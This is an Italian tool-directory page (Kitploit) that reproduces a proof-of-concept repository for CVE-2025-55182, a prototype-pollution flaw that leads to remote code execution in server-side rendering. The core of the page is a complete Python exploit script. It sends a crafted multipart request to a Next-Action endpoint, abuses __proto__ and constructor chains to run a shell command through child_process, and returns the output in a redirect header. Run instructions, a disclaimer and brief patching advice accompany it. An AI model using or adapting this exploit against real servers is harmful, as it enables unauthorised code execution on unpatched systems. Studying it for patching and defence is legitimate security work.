Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182-Proof-of-Concept — Exploit proof-of-concept per CVE-2025-55182, che dimostra l'inquinamento del prototipo che porta all'esecuzione remota di codice nelle implementazioni di rendering lato server. Include script di exploit Python e raccomandazioni di sicurezza. | Kitploit
Strumenti/GitHubGitHub/thekamran/cve-2025-55182-proof-of-concept
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebApprendimento e FormazioneSviluppo Payload
GitHubthekamran/cve-2025-55182-proof-of-concept

CVE-2025-55182-Proof-of-Concept

Exploit proof-of-concept per CVE-2025-55182, che dimostra l'inquinamento del prototipo che porta all'esecuzione remota di codice nelle implementazioni di rendering lato server. Include script di exploit Python e raccomandazioni di sicurezza.

Vedi Repository
9 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55182 Prova di concetto

Questa repository contiene una prova di concetto (PoC) per CVE-2025-55182, una vulnerabilità che coinvolge Prototype Pollution che porta a Remote Code Execution (RCE) in alcune implementazioni di rendering lato server.

⚠️ Avvertenza: Questa PoC è strettamente per scopi educativi, di ricerca e test di sicurezza autorizzati su ambienti personali o controllati. L'uso non autorizzato su sistemi senza permesso è illegale.


Panoramica della vulnerabilità

La vulnerabilità si verifica quando input utente non validato viene iniettato nelle strutture interne degli oggetti JavaScript (Prototype Pollution). Quando combinata con specifici flussi di esecuzione, può portare a esecuzione di codice arbitrario.

In questa PoC, proprietà concatenate come __proto__ e constructor vengono utilizzate per elevare la pollution a un contesto di esecuzione.


Prova di concetto

Di seguito è riportato il file exploit.py che mostra come la vulnerabilità può essere sfruttata:

root@kitploit:~
import requests
import json

url = "http://localhost:3000"

headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36",
    "Next-Action": "x",
}

prefix = "var res=process.mainModule.require('child_process').execSync('id').toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});"

files = {
    "0": (
        None,
        json.dumps({
            "then": "$1:__proto__:then",
            "status": "resolved_model",
            "reason": -1,
            "value": '{"then":"$B1337"}',
            "_response": {
                "_prefix": prefix,
                "_formData": {"get": "$1:constructor:constructor"}
            }
        }),
        "application/json",
    ),
    "1": (None, "\"$@0\""),
}

response = requests.post(url, headers=headers, files=files)

print("Headers:", response.headers.get('x-action-redirect'))

Come eseguire

root@kitploit:~
python3 exploit.py

Assicurati di eseguirlo solo in un ambiente locale o di sviluppo.


Stato della patch

Se questa vulnerabilità riguarda un progetto reale, verifica e installa le ultime patch di sicurezza rilasciate dai manutentori.


Raccomandazioni di sicurezza

  • Esegui regolarmente npm audit e applica npm audit fix per mantenere sicure le dipendenze
  • Valida e sanifica tutto l'input utente
  • Impedisci l'accesso ai prototipi interni degli oggetti JavaScript
  • Usa l'isolamento sandbox SSR quando possibile
  • Limita o disabilita l'esecuzione di child_process in produzione

Licenza

MIT License

Scarica lo strumento